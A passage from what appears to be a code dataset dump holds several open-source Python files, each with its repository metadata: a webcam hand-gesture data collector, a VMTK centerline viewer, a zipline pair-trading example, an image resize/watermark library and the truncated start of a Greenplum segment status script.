    image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB) # preprocess (convert color format & mirror the image)
    results = hands.process(image) # runs preprocessing and model inference together
    image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # convert color format back for display
    if results.multi_hand_landmarks: # truthy when a hand was detected above
        for hand_landmarks in results.multi_hand_landmarks: # iterate detected hands (max_num_hands=1 here)
            joint = np.zeros((21, 3)) # joints -> 21 landmark points, xyz each
            for j, lm in enumerate(hand_landmarks.landmark):
                joint[j] = [lm.x, lm.y, lm.z] # fill in the coordinates
            # subtract joint indices to get the bone vectors (as in Fig 3 of the reference)
            v1 = joint[[0,1,2,3,0,5,6,7,0,9,10,11,0,13,14,15,0,17,18,19],:] # Parent joint
            v2 = joint[[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],:] # Child joint
            v = v2 - v1 # [20,3]
            # normalize each bone vector by its length
            v = v / np.linalg.norm(v, axis=1)[:, np.newaxis]
            # Get angle using arcos of dot product
            angle = np.arccos(np.einsum('nt,nt->n',
                v[[0,1,2,4,5,6,8,9,10,12,13,14,16,17,18],:],
                v[[1,2,3,5,6,7,9,10,11,13,14,15,17,18,19],:])) # [15,]
            angle = np.degrees(angle) # Convert radian to degree
            # assemble the training sample: 15 joint angles + class label
            data = np.array([angle], dtype=np.float32)
            data = np.append(data, 14) # append the label index of the gesture being recorded (14 = 'dog')
            # print(data)
            mp_drawing.draw_landmarks(image, hand_landmarks, mp_hands.HAND_CONNECTIONS) # draw the skeleton on the frame
    cv2.imshow('Hand Cam', image) # show the window
    if cv2.waitKey(1) == ord('q'):
        break
np.savetxt('gesture_trained.csv', file, delimiter=',') # save the file with the appended samples
| 38.987654 | 112 | 0.579164 |
import cv2
import mediapipe as mp
import numpy as np
gesture = {
0:'fist', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five',
6:'six', 7:'rock', 8:'spiderman', 9:'yeah', 10:'ok'
}
hand_gesture = {
0:'fist', 1:'one', 2:'gun', 3:'three', 4:'four', 5:'five',
6:'promise', 7:'spiderman', 8:'niconiconi', 9:'two', 10:'ok',
11:'claws', 12:'good', 13:'fanxyChild', 14:'dog'
}
mp_hands = mp.solutions.hands
mp_drawing = mp.solutions.drawing_utils
hands = mp_hands.Hands(max_num_hands = 1, min_detection_confidence = 0.5, min_tracking_confidence = 0.5)
file = np.genfromtxt('gesture_trained.csv', delimiter=',')
cam = cv2.VideoCapture(0)
def click(event, x, y, flags, param):
global data, file
if event == cv2.EVENT_LBUTTONDOWN:
file = np.vstack((file, data))
print(file.shape)
cv2.namedWindow('Hand Cam')
cv2.setMouseCallback('Hand Cam', click)
while cam.isOpened():
success, image = cam.read()
if not success:
continue
image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)
results = hands.process(image)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
if results.multi_hand_landmarks:
for hand_landmarks in results.multi_hand_landmarks:
joint = np.zeros((21, 3))
for j, lm in enumerate(hand_landmarks.landmark):
joint[j] = [lm.x, lm.y, lm.z]
v1 = joint[[0,1,2,3,0,5,6,7,0,9,10,11,0,13,14,15,0,17,18,19],:]
v2 = joint[[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],:]
v = v2 - v1
v = v / np.linalg.norm(v, axis=1)[:, np.newaxis]
angle = np.arccos(np.einsum('nt,nt->n',
v[[0,1,2,4,5,6,8,9,10,12,13,14,16,17,18],:],
v[[1,2,3,5,6,7,9,10,11,13,14,15,17,18,19],:]))
angle = np.degrees(angle)
data = np.array([angle], dtype=np.float32)
data = np.append(data, 14)
mp_drawing.draw_landmarks(image, hand_landmarks, mp_hands.HAND_CONNECTIONS)
cv2.imshow('Hand Cam', image)
if cv2.waitKey(1) == ord('q'):
break
np.savetxt('gesture_trained.csv', file, delimiter=',')
| true | true |
f7fa35ee8fa6810fbc106dfbee55183269fe9b24 | 7,383 | py | Python | vmtkScripts/vmtkcenterlineviewer.py | daron1337/vmtk | df401c88959ccf758b1bc6353786600473187683 | [
"Apache-2.0"
] | 3 | 2016-02-26T17:30:04.000Z | 2017-11-09T03:24:04.000Z | vmtkScripts/vmtkcenterlineviewer.py | ElenaFagg/vmtk | 5c90b786afae3b2d84c79df593e648ada26402e3 | [
"Apache-2.0"
] | null | null | null | vmtkScripts/vmtkcenterlineviewer.py | ElenaFagg/vmtk | 5c90b786afae3b2d84c79df593e648ada26402e3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
## Program: VMTK
## Module: $RCSfile: vmtkcenterlineviewer.py,v $
## Language: Python
## Date: $Date: 2006/05/26 12:35:13 $
## Version: $Revision: 1.3 $
## Copyright (c) Luca Antiga, David Steinman. All rights reserved.
## See LICENCE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
import vtk
import sys
import vtkvmtk
import vmtkrenderer
import pypes
vmtkcenterlineviewer = 'vmtkCenterlineViewer'
class vmtkCenterlineViewer(pypes.pypeScript):
    """Render centerlines, optionally colored by a point-data array or
    labeled by a cell-data array, using a configurable color map."""

    def __init__(self):

        pypes.pypeScript.__init__(self)

        # Members populated by the pype machinery from the declarations below.
        self.Centerlines = None
        self.PointDataArrayName = ''
        self.CellDataArrayName = ''
        self.Display = 1
        self.Legend = 1
        self.ColorMap = 'cooltowarm'
        self.NumberOfColors = 256
        self.vmtkRenderer = None
        self.OwnRenderer = 0

        self.SetScriptName('vmtkcenterlineviewer')
        self.SetScriptDoc('')
        self.SetInputMembers([
            ['Centerlines','i','vtkPolyData',1,'','the input surface','vmtksurfacereader'],
            ['PointDataArrayName','pointarray','str',1,''],
            ['CellDataArrayName','cellarray','str',1,''],
            ['Legend','legend','bool',1,''],
            ['ColorMap','colormap','str',1,'["rainbow","blackbody","cooltowarm","grayscale"]','choose the color map'],
            ['NumberOfColors','numberofcolors','int',1,'','number of colors in the color map'],
            ['vmtkRenderer','renderer','vmtkRenderer',1,'','external renderer']])
        self.SetOutputMembers([
            ['Centerlines','o','vtkPolyData',1,'','the output centerlines','vmtksurfacewriter']])

    def _SampleTransferFunctionIntoLUT(self, mapper, colorTransferFunction):
        """Fill the mapper's lookup table by sampling colorTransferFunction
        at NumberOfColors evenly spaced points in [0, 1)."""
        lut = mapper.GetLookupTable()
        lut.SetNumberOfTableValues(self.NumberOfColors)
        for ii in range(self.NumberOfColors):
            cc = colorTransferFunction.GetColor(float(ii)/float(self.NumberOfColors))
            lut.SetTableValue(ii,cc[0],cc[1],cc[2],1.0)
        lut.Build()
        mapper.SetLookupTable(lut)

    def _ConfigureColorMap(self, mapper):
        """Install the color map named by self.ColorMap on the mapper.

        Consolidates what used to be four near-identical inline branches;
        an unknown name leaves the mapper's default lookup table untouched.
        """
        if self.ColorMap == 'grayscale':
            lut = mapper.GetLookupTable()
            lut.SetNumberOfTableValues(self.NumberOfColors)
            lut.SetValueRange(0.0,1.0)
            lut.SetSaturationRange(0.0,0.0)
            lut.Build()
            mapper.SetLookupTable(lut)
        elif self.ColorMap == 'rainbow':
            lut = mapper.GetLookupTable()
            lut.SetHueRange(0.666667,0.0)
            lut.SetSaturationRange(0.75,0.75)
            lut.SetValueRange(1.0,1.0)
            lut.SetAlphaRange(1.0,1.0)
            lut.SetNumberOfColors(self.NumberOfColors)
            lut.Build()
            mapper.SetLookupTable(lut)
        elif self.ColorMap == 'blackbody':
            colorTransferFunction = vtk.vtkColorTransferFunction()
            colorTransferFunction.SetColorSpaceToRGB()
            colorTransferFunction.AddRGBPoint(0,0.0,0.0,0.0)
            colorTransferFunction.AddRGBPoint(0.4,0.901961,0.0,0.0)
            colorTransferFunction.AddRGBPoint(0.8,0.901961,0.901961,0.0)
            colorTransferFunction.AddRGBPoint(1.0,1.0,1.0,1.0)
            self._SampleTransferFunctionIntoLUT(mapper, colorTransferFunction)
        elif self.ColorMap == 'cooltowarm':
            colorTransferFunction = vtk.vtkColorTransferFunction()
            colorTransferFunction.SetColorSpaceToDiverging()
            colorTransferFunction.AddRGBPoint(0,0.231373,0.298039,0.752941)
            colorTransferFunction.AddRGBPoint(0.5,0.865003,0.865003,0.865003)
            colorTransferFunction.AddRGBPoint(1.0,0.705882,0.0156863,0.14902)
            self._SampleTransferFunctionIntoLUT(mapper, colorTransferFunction)

    def Execute(self):

        if not self.Centerlines:
            self.PrintError('Error: No input centerlines.')
            return

        if not self.vmtkRenderer:
            self.vmtkRenderer = vmtkrenderer.vmtkRenderer()
            self.vmtkRenderer.Initialize()
            self.OwnRenderer = 1

        self.vmtkRenderer.RegisterScript(self)

        if self.CellDataArrayName:
            # Label each cell with its scalar value, placed at the cell center.
            cellCenters = vtk.vtkCellCenters()
            cellCenters.SetInputData(self.Centerlines)
            cellCenters.Update()
            cellCenters.GetOutput().GetPointData().SetActiveScalars(self.CellDataArrayName)
            labelsMapper = vtk.vtkLabeledDataMapper()
            labelsMapper.SetInputConnection(cellCenters.GetOutputPort())
            labelsMapper.SetLabelModeToLabelScalars()
            labelsActor = vtk.vtkActor2D()
            labelsActor.SetMapper(labelsMapper)
            self.vmtkRenderer.Renderer.AddActor(labelsActor)

        centerlineMapper = vtk.vtkPolyDataMapper()
        centerlineMapper.SetInputData(self.Centerlines)
        # Point-data coloring takes precedence when both array names are set.
        if self.CellDataArrayName and not self.PointDataArrayName:
            centerlineMapper.ScalarVisibilityOn()
            centerlineMapper.SetScalarModeToUseCellData()
            self.Centerlines.GetCellData().SetActiveScalars(self.CellDataArrayName)
            centerlineMapper.SetScalarRange(self.Centerlines.GetCellData().GetScalars().GetRange(0))
        elif self.PointDataArrayName:
            centerlineMapper.ScalarVisibilityOn()
            centerlineMapper.SetScalarModeToUsePointData()
            self.Centerlines.GetPointData().SetActiveScalars(self.PointDataArrayName)
            centerlineMapper.SetScalarRange(self.Centerlines.GetPointData().GetScalars().GetRange(0))
        else:
            centerlineMapper.ScalarVisibilityOff()

        self._ConfigureColorMap(centerlineMapper)

        centerlineActor = vtk.vtkActor()
        centerlineActor.SetMapper(centerlineMapper)
        self.vmtkRenderer.Renderer.AddActor(centerlineActor)

        # A scalar bar legend is only meaningful when coloring by point data.
        scalarBarActor = None
        if self.Legend and centerlineActor and self.PointDataArrayName:
            scalarBarActor = vtk.vtkScalarBarActor()
            scalarBarActor.SetLookupTable(centerlineActor.GetMapper().GetLookupTable())
            scalarBarActor.GetLabelTextProperty().ItalicOff()
            scalarBarActor.GetLabelTextProperty().BoldOff()
            scalarBarActor.GetLabelTextProperty().ShadowOff()
            scalarBarActor.SetLabelFormat('%.2f')
            scalarBarActor.SetTitle(self.PointDataArrayName)
            self.vmtkRenderer.Renderer.AddActor(scalarBarActor)

        if self.Display:
            self.vmtkRenderer.Render()

        if self.OwnRenderer:
            self.vmtkRenderer.Deallocate()
if __name__=='__main__':
    # Standalone invocation: run this script through the pype machinery.
    main = pypes.pypeMain()
    main.Arguments = sys.argv
    main.Execute()
| 41.477528 | 118 | 0.646214 |
= 256
self.vmtkRenderer = None
self.OwnRenderer = 0
self.SetScriptName('vmtkcenterlineviewer')
self.SetScriptDoc('')
self.SetInputMembers([
['Centerlines','i','vtkPolyData',1,'','the input surface','vmtksurfacereader'],
['PointDataArrayName','pointarray','str',1,''],
['CellDataArrayName','cellarray','str',1,''],
['Legend','legend','bool',1,''],
['ColorMap','colormap','str',1,'["rainbow","blackbody","cooltowarm","grayscale"]','choose the color map'],
['NumberOfColors','numberofcolors','int',1,'','number of colors in the color map'],
['vmtkRenderer','renderer','vmtkRenderer',1,'','external renderer']])
self.SetOutputMembers([
['Centerlines','o','vtkPolyData',1,'','the output centerlines','vmtksurfacewriter']])
def Execute(self):
if not self.Centerlines:
self.PrintError('Error: No input centerlines.')
return
if not self.vmtkRenderer:
self.vmtkRenderer = vmtkrenderer.vmtkRenderer()
self.vmtkRenderer.Initialize()
self.OwnRenderer = 1
self.vmtkRenderer.RegisterScript(self)
if self.CellDataArrayName:
cellCenters = vtk.vtkCellCenters()
cellCenters.SetInputData(self.Centerlines)
cellCenters.Update()
cellCenters.GetOutput().GetPointData().SetActiveScalars(self.CellDataArrayName)
labelsMapper = vtk.vtkLabeledDataMapper();
labelsMapper.SetInputConnection(cellCenters.GetOutputPort())
labelsMapper.SetLabelModeToLabelScalars()
labelsActor = vtk.vtkActor2D()
labelsActor.SetMapper(labelsMapper)
self.vmtkRenderer.Renderer.AddActor(labelsActor)
centerlineMapper = vtk.vtkPolyDataMapper()
centerlineMapper.SetInputData(self.Centerlines)
if self.CellDataArrayName and not self.PointDataArrayName:
centerlineMapper.ScalarVisibilityOn()
centerlineMapper.SetScalarModeToUseCellData()
self.Centerlines.GetCellData().SetActiveScalars(self.CellDataArrayName)
centerlineMapper.SetScalarRange(self.Centerlines.GetCellData().GetScalars().GetRange(0))
elif self.PointDataArrayName:
centerlineMapper.ScalarVisibilityOn()
centerlineMapper.SetScalarModeToUsePointData()
self.Centerlines.GetPointData().SetActiveScalars(self.PointDataArrayName)
centerlineMapper.SetScalarRange(self.Centerlines.GetPointData().GetScalars().GetRange(0))
else:
centerlineMapper.ScalarVisibilityOff()
if self.ColorMap == 'grayscale':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
lut.SetValueRange(0.0,1.0)
lut.SetSaturationRange(0.0,0.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'rainbow':
lut = centerlineMapper.GetLookupTable()
lut.SetHueRange(0.666667,0.0)
lut.SetSaturationRange(0.75,0.75)
lut.SetValueRange(1.0,1.0)
lut.SetAlphaRange(1.0,1.0)
lut.SetNumberOfColors(self.NumberOfColors)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'blackbody':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
colorTransferFunction = vtk.vtkColorTransferFunction()
colorTransferFunction.SetColorSpaceToRGB()
colorTransferFunction.AddRGBPoint(0,0.0,0.0,0.0)
colorTransferFunction.AddRGBPoint(0.4,0.901961,0.0,0.0)
colorTransferFunction.AddRGBPoint(0.8,0.901961,0.901961,0.0)
colorTransferFunction.AddRGBPoint(1.0,1.0,1.0,1.0)
for ii,ss in enumerate([float(xx)/float(self.NumberOfColors) for xx in range(self.NumberOfColors)]):
cc = colorTransferFunction.GetColor(ss)
lut.SetTableValue(ii,cc[0],cc[1],cc[2],1.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'cooltowarm':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
colorTransferFunction = vtk.vtkColorTransferFunction()
colorTransferFunction.SetColorSpaceToDiverging()
colorTransferFunction.AddRGBPoint(0,0.231373,0.298039,0.752941)
colorTransferFunction.AddRGBPoint(0.5,0.865003,0.865003,0.865003)
colorTransferFunction.AddRGBPoint(1.0,0.705882,0.0156863,0.14902)
for ii,ss in enumerate([float(xx)/float(self.NumberOfColors) for xx in range(self.NumberOfColors)]):
cc = colorTransferFunction.GetColor(ss)
lut.SetTableValue(ii,cc[0],cc[1],cc[2],1.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
centerlineActor = vtk.vtkActor()
centerlineActor.SetMapper(centerlineMapper)
self.vmtkRenderer.Renderer.AddActor(centerlineActor)
scalarBarActor = None
if self.Legend and centerlineActor and self.PointDataArrayName:
scalarBarActor = vtk.vtkScalarBarActor()
scalarBarActor.SetLookupTable(centerlineActor.GetMapper().GetLookupTable())
scalarBarActor.GetLabelTextProperty().ItalicOff()
scalarBarActor.GetLabelTextProperty().BoldOff()
scalarBarActor.GetLabelTextProperty().ShadowOff()
scalarBarActor.SetLabelFormat('%.2f')
scalarBarActor.SetTitle(self.PointDataArrayName)
self.vmtkRenderer.Renderer.AddActor(scalarBarActor)
if self.Display:
self.vmtkRenderer.Render()
if self.OwnRenderer:
self.vmtkRenderer.Deallocate()
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
| false | true |
f7fa36c0be2d9710696527fe65ebe65716568d3b | 5,713 | py | Python | zipline/examples/pairtrade.py | colin1alexander/zipline | ba42e6d8b972dcce9271526562ceff0cddd3fa30 | [
"Apache-2.0"
] | null | null | null | zipline/examples/pairtrade.py | colin1alexander/zipline | ba42e6d8b972dcce9271526562ceff0cddd3fa30 | [
"Apache-2.0"
] | null | null | null | zipline/examples/pairtrade.py | colin1alexander/zipline | ba42e6d8b972dcce9271526562ceff0cddd3fa30 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logbook
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
from datetime import datetime
import pytz
from zipline.algorithm import TradingAlgorithm
from zipline.transforms import batch_transform
from zipline.utils.factory import load_from_yahoo
from zipline.api import symbol
@batch_transform
def ols_transform(data, sid1, sid2):
"""Computes regression coefficient (slope and intercept)
via Ordinary Least Squares between two SIDs.
"""
p0 = data.price[sid1].values
p1 = sm.add_constant(data.price[sid2].values, prepend=True)
slope, intercept = sm.OLS(p0, p1).fit().params
return slope, intercept
class Pairtrade(TradingAlgorithm):
"""Pairtrading relies on cointegration of two stocks.
The expectation is that once the two stocks drifted apart
(i.e. there is spread), they will eventually revert again. Thus,
if we short the upward drifting stock and long the downward
drifting stock (in short, we buy the spread) once the spread
widened we can sell the spread with profit once they converged
again. A nice property of this algorithm is that we enter the
market in a neutral position.
This specific algorithm tries to exploit the cointegration of
Pepsi and Coca Cola by estimating the correlation between the
two. Divergence of the spread is evaluated by z-scoring.
"""
def initialize(self, window_length=100):
self.spreads = []
self.invested = 0
self.window_length = window_length
self.ols_transform = ols_transform(refresh_period=self.window_length,
window_length=self.window_length)
self.PEP = self.symbol('PEP')
self.KO = self.symbol('KO')
def handle_data(self, data):
######################################################
# 1. Compute regression coefficients between PEP and KO
params = self.ols_transform.handle_data(data, self.PEP, self.KO)
if params is None:
return
intercept, slope = params
######################################################
# 2. Compute spread and zscore
zscore = self.compute_zscore(data, slope, intercept)
self.record(zscores=zscore,
PEP=data[symbol('PEP')].price,
KO=data[symbol('KO')].price)
######################################################
# 3. Place orders
self.place_orders(data, zscore)
def compute_zscore(self, data, slope, intercept):
"""1. Compute the spread given slope and intercept.
2. zscore the spread.
"""
spread = (data[self.PEP].price -
(slope * data[self.KO].price + intercept))
self.spreads.append(spread)
spread_wind = self.spreads[-self.window_length:]
zscore = (spread - np.mean(spread_wind)) / np.std(spread_wind)
return zscore
def place_orders(self, data, zscore):
"""Buy spread if zscore is > 2, sell if zscore < .5.
"""
if zscore >= 2.0 and not self.invested:
self.order(self.PEP, int(100 / data[self.PEP].price))
self.order(self.KO, -int(100 / data[self.KO].price))
self.invested = True
elif zscore <= -2.0 and not self.invested:
self.order(self.PEP, -int(100 / data[self.PEP].price))
self.order(self.KO, int(100 / data[self.KO].price))
self.invested = True
elif abs(zscore) < .5 and self.invested:
self.sell_spread()
self.invested = False
def sell_spread(self):
"""
decrease exposure, regardless of position long/short.
buy for a short position, sell for a long.
"""
ko_amount = self.portfolio.positions[self.KO].amount
self.order(self.KO, -1 * ko_amount)
pep_amount = self.portfolio.positions[self.PEP].amount
self.order(self.PEP, -1 * pep_amount)
# Note: this function can be removed if running
# this algorithm on quantopian.com
def analyze(context=None, results=None):
ax1 = plt.subplot(211)
plt.title('PepsiCo & Coca-Cola Co. share prices')
results[['PEP', 'KO']].plot(ax=ax1)
plt.ylabel('Price (USD)')
plt.setp(ax1.get_xticklabels(), visible=False)
ax2 = plt.subplot(212, sharex=ax1)
results.zscores.plot(ax=ax2, color='r')
plt.ylabel('Z-scored spread')
plt.gcf().set_size_inches(18, 8)
plt.show()
# Note: this if-block should be removed if running
# this algorithm on quantopian.com
if __name__ == '__main__':
logbook.StderrHandler().push_application()
# Set the simulation start and end dates.
start = datetime(2000, 1, 1, 0, 0, 0, 0, pytz.utc)
end = datetime(2002, 1, 1, 0, 0, 0, 0, pytz.utc)
# Load price data from yahoo.
data = load_from_yahoo(stocks=['PEP', 'KO'], indexes={},
start=start, end=end)
# Create and run the algorithm.
pairtrade = Pairtrade()
results = pairtrade.run(data)
# Plot the portfolio data.
analyze(results=results)
| 35.930818 | 77 | 0.636093 |
import logbook
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
from datetime import datetime
import pytz
from zipline.algorithm import TradingAlgorithm
from zipline.transforms import batch_transform
from zipline.utils.factory import load_from_yahoo
from zipline.api import symbol
@batch_transform
def ols_transform(data, sid1, sid2):
p0 = data.price[sid1].values
p1 = sm.add_constant(data.price[sid2].values, prepend=True)
slope, intercept = sm.OLS(p0, p1).fit().params
return slope, intercept
class Pairtrade(TradingAlgorithm):
def initialize(self, window_length=100):
self.spreads = []
self.invested = 0
self.window_length = window_length
self.ols_transform = ols_transform(refresh_period=self.window_length,
window_length=self.window_length)
self.PEP = self.symbol('PEP')
self.KO = self.symbol('KO')
def handle_data(self, data):
| true | true |
f7fa36e765b643cef087a41180e1be7f91ad584a | 3,522 | py | Python | aperturelib/__init__.py | Aperture-py/aperture-lib | 5c54af216319f297ddf96181a16f088cf1ba23f3 | [
"MIT"
] | null | null | null | aperturelib/__init__.py | Aperture-py/aperture-lib | 5c54af216319f297ddf96181a16f088cf1ba23f3 | [
"MIT"
] | 4 | 2021-03-18T20:57:02.000Z | 2021-09-08T00:06:56.000Z | aperturelib/__init__.py | Aperture-py/aperture-lib | 5c54af216319f297ddf96181a16f088cf1ba23f3 | [
"MIT"
] | null | null | null | ''' Aperturelib '''
# Supported formats may be found here: http://pillow.readthedocs.io/en/5.1.x/handbook/image-file-formats.html
SUPPORTED_EXTENSIONS = ('.jpg', '.jpeg', '.gif', '.png')
from PIL import Image
from .resize import resize_image as resize
from .watermark import watermark_image
from .watermark import watermark_text
def open(f):
'''Opens an instance of a PIL Image.
This is a wrapper for the PIL Image open function.
Args:
f: File path or File object.
Returns:
(PIL.Image) An instance of a PIL image.
'''
return Image.open(f)
def format_image(path, options):
'''Formats an image.
Args:
path (str): Path to the image file.
options (dict): Options to apply to the image.
Returns:
(list) A list of PIL images. The list will always be of length
1 unless resolutions for resizing are provided in the options.
'''
image = Image.open(path)
image_pipeline_results = __pipeline_image(image, options)
return image_pipeline_results
def save(image, out_file, **kwargs):
'''Saves an instance of a PIL Image to the system.
This is a wrapper for the PIL Image save function.
Args:
img: An instance of a PIL Image.
out_file: Path to save the image to.
**kwargs: Additonal save options supported by PIL.
(see https://pillow.readthedocs.io/en/5.1.x/handbook/image-file-formats.html)
'''
image.save(out_file, **kwargs)
# Internal Methods
# =========================
def __pipeline_image(image, options):
'''Sends an image through a processing pipeline.
Applies all (relevant) provided options to a given image.
Args:
image: An instance of a PIL Image.
options: Options to apply to the image (i.e. resolutions).
Returns:
A list containing instances of PIL Images. This list will always be length
1 if no options exist that require multiple copies to be created for a single
image (i.e resolutions).
'''
results = []
# Begin pipline
# 1. Create image copies for each resolution
if 'resolutions' in options:
resolutions = options['resolutions'] # List of resolution tuples
for res in resolutions:
img_rs = resize(image, res) # Resized image
# Add image to result set. This result set will be pulled from
# throughout the pipelining process to perform more processing (watermarking).
results.append(img_rs)
# 2. Apply watermark to each image copy
if 'wmark-img' in options:
wtrmk_path = options['wmark-img']
if wtrmk_path:
if len(results) == 0:
image = watermark_image(image, wtrmk_path) #watermark actual image?
else:
for i in range(0, len(results)):
results[i] = watermark_image(
results[i], wtrmk_path) #watermark actual image
if 'wmark-txt' in options:
wtrmk_txt = options['wmark-txt']
if wtrmk_txt:
if len(results) == 0:
image = watermark_text(image, wtrmk_txt) #watermark actual image?
else:
for i in range(0, len(results)):
results[i] = watermark_text(results[i],
wtrmk_txt) #watermark actual image
# Fallback: Nothing was done to the image
if len(results) == 0:
results.append(image)
return results | 32.018182 | 109 | 0.617547 |
SUPPORTED_EXTENSIONS = ('.jpg', '.jpeg', '.gif', '.png')
from PIL import Image
from .resize import resize_image as resize
from .watermark import watermark_image
from .watermark import watermark_text
def open(f):
return Image.open(f)
def format_image(path, options):
image = Image.open(path)
image_pipeline_results = __pipeline_image(image, options)
return image_pipeline_results
def save(image, out_file, **kwargs):
image.save(out_file, **kwargs)
def __pipeline_image(image, options):
results = []
if 'resolutions' in options:
resolutions = options['resolutions']
for res in resolutions:
img_rs = resize(image, res)
results.append(img_rs)
if 'wmark-img' in options:
wtrmk_path = options['wmark-img']
if wtrmk_path:
if len(results) == 0:
image = watermark_image(image, wtrmk_path)
else:
for i in range(0, len(results)):
results[i] = watermark_image(
results[i], wtrmk_path)
if 'wmark-txt' in options:
wtrmk_txt = options['wmark-txt']
if wtrmk_txt:
if len(results) == 0:
image = watermark_text(image, wtrmk_txt)
else:
for i in range(0, len(results)):
results[i] = watermark_text(results[i],
wtrmk_txt)
if len(results) == 0:
results.append(image)
return results | true | true |
f7fa374159192d68eb92a8a0ef092eaf359372ac | 164 | py | Python | Aula10 - Curso em Video/Exercicio_05.py | DheniMoura/Python_Curso-em-Video | 60a00a36a188ff8a305a3ab92450c9d75cb25aee | [
"MIT"
] | null | null | null | Aula10 - Curso em Video/Exercicio_05.py | DheniMoura/Python_Curso-em-Video | 60a00a36a188ff8a305a3ab92450c9d75cb25aee | [
"MIT"
] | null | null | null | Aula10 - Curso em Video/Exercicio_05.py | DheniMoura/Python_Curso-em-Video | 60a00a36a188ff8a305a3ab92450c9d75cb25aee | [
"MIT"
] | null | null | null | num = []
for i in range(0,3):
num.append(float(input('Digite um número: ')))
maior = max(num)
menor = min(num)
print('maior: ', maior)
print('menor: ', menor) | 18.222222 | 50 | 0.615854 | num = []
for i in range(0,3):
num.append(float(input('Digite um número: ')))
maior = max(num)
menor = min(num)
print('maior: ', maior)
print('menor: ', menor) | true | true |
f7fa37609a642250193991cca36aebd6128e5b13 | 8,105 | py | Python | gpMgmt/sbin/gpgetstatususingtransition.py | gridgentoo/gpdb | f3dc101a7b4fa3d392f79cc5146b20c83894eb19 | [
"PostgreSQL",
"Apache-2.0"
] | 9 | 2018-04-20T03:31:01.000Z | 2020-05-13T14:10:53.000Z | gpMgmt/sbin/gpgetstatususingtransition.py | gridgentoo/gpdb | f3dc101a7b4fa3d392f79cc5146b20c83894eb19 | [
"PostgreSQL",
"Apache-2.0"
] | 36 | 2017-09-21T09:12:27.000Z | 2020-06-17T16:40:48.000Z | gpMgmt/sbin/gpgetstatususingtransition.py | gridgentoo/gpdb | f3dc101a7b4fa3d392f79cc5146b20c83894eb19 | [
"PostgreSQL",
"Apache-2.0"
] | 32 | 2017-08-31T12:50:52.000Z | 2022-03-01T07:34:53.000Z | #!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2010. All Rights Reserved.
#
#
# THIS IMPORT MUST COME FIRST
# import mainUtils FIRST to get python version check
#
from gppylib.mainUtils import *
import os, sys
import pickle, base64
from optparse import Option, OptionGroup, OptionParser, OptionValueError
from gppylib.gpparseopts import OptParser, OptChecker
from gppylib import gplog, gparray, pgconf
from gppylib.commands import base, gp, pg, unix
from gppylib.db import dbconn
from gppylib.utils import parseKeyColonValueLines
logger = gplog.get_default_logger()
#
# todo: the file containing this should be renamed since it gets more status than just from transition
#
class GpSegStatusProgram:
"""
Program to fetch status from the a segment(s).
Multiple pieces of status information can be fetched in a single request by
passing in multiple status request options on the command line
"""
def __init__(self, options):
self.__options = options
self.__pool = None
def getPidStatus(self, seg, pidRunningStatus):
"""
returns a dict containing "pid" and "error" fields. Note that
the "error" field may be non-None even when pid is non-zero (pid if zero indicates
unable to determine the pid). This can happen if the pid is there in the
lock file but not active on the port.
The caller can rely on this to try to differentiate between an active pid and an inactive one
"""
lockFileExists = pidRunningStatus['lockFileExists']
netstatPortActive = pidRunningStatus['netstatPortActive']
pidValue = pidRunningStatus['pidValue']
lockFileName = gp.get_lockfile_name(seg.getSegmentPort())
error = None
if not lockFileExists and not netstatPortActive:
error = "No socket connection or lock file (%s) found for port %s" % (lockFileName, seg.getSegmentPort())
elif not lockFileExists and netstatPortActive:
error = "No lock file %s but process running on port %s" % (lockFileName, seg.getSegmentPort())
elif lockFileExists and not netstatPortActive:
error = "Have lock file %s but no process running on port %s" % (lockFileName, seg.getSegmentPort())
else:
if pidValue == 0:
error = "Have lock file and process is active, but did not get a pid value" # this could be an assert?
res = {}
res['pid'] = pidValue
res['error'] = error
return res
def getPidRunningStatus(self, seg):
"""
Get an object containing various information about the postmaster pid's status
"""
(postmasterPidFileExists, tempFileExists, lockFileExists, netstatPortActive, pidValue) = \
gp.chk_local_db_running(seg.getSegmentDataDirectory(), seg.getSegmentPort())
return {
'postmasterPidFileExists' : postmasterPidFileExists,
'tempFileExists' : tempFileExists,
'lockFileExists' : lockFileExists,
'netstatPortActive' : netstatPortActive,
'pidValue' : pidValue
}
def __processMirrorStatusOutput(self, str):
data = parseKeyColonValueLines(str)
if data is None:
return data
# verify that all expected ones are there
for expected in ["mode","segmentState","dataState", "postmasterState", "databaseStatus", "isFullResync",
"resyncNumCompleted","resyncTotalToComplete","estimatedCompletionTimeSecondsSinceEpoch",
"totalResyncObjectCount", "curResyncObjectCount", "changeTrackingBytesUsed"]:
if expected not in data:
